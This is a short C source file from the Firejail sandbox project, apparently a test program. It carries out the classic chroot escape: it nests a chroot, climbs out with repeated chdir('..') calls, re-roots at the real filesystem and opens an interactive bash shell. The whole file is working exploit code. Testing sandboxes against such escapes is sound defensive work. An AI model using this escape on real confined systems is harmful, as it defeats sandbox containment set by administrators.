blob: 4454dd1c476ff21a49f3ba80794ba0af8e7be3f7 (
plain) (
blame)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
|
// This file is part of Firejail project
// Copyright (C) 2014-2020 Firejail Authors
// License GPL v2
// simple unchroot example from http://linux-vserver.org/Secure_chroot_Barrier
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
void die(char *msg) {
perror(msg);
exit(1);
}
int main(int argc, char *argv[])
{
int i;
if (chdir("/") != 0)
die("chdir(/)");
if (mkdir("baz", 0777) != 0)
; //die("mkdir(baz)");
if (chroot("baz") != 0)
die("chroot(baz)");
for (i=0; i<50; i++) {
if (chdir("..") != 0)
die("chdir(..)");
}
if (chroot(".") != 0)
die("chroot(.)");
printf("Exploit seems to work. =)\n");
execl("/bin/bash", "bash", "-i", (char *)0);
die("exec bash");
exit(0);
}
|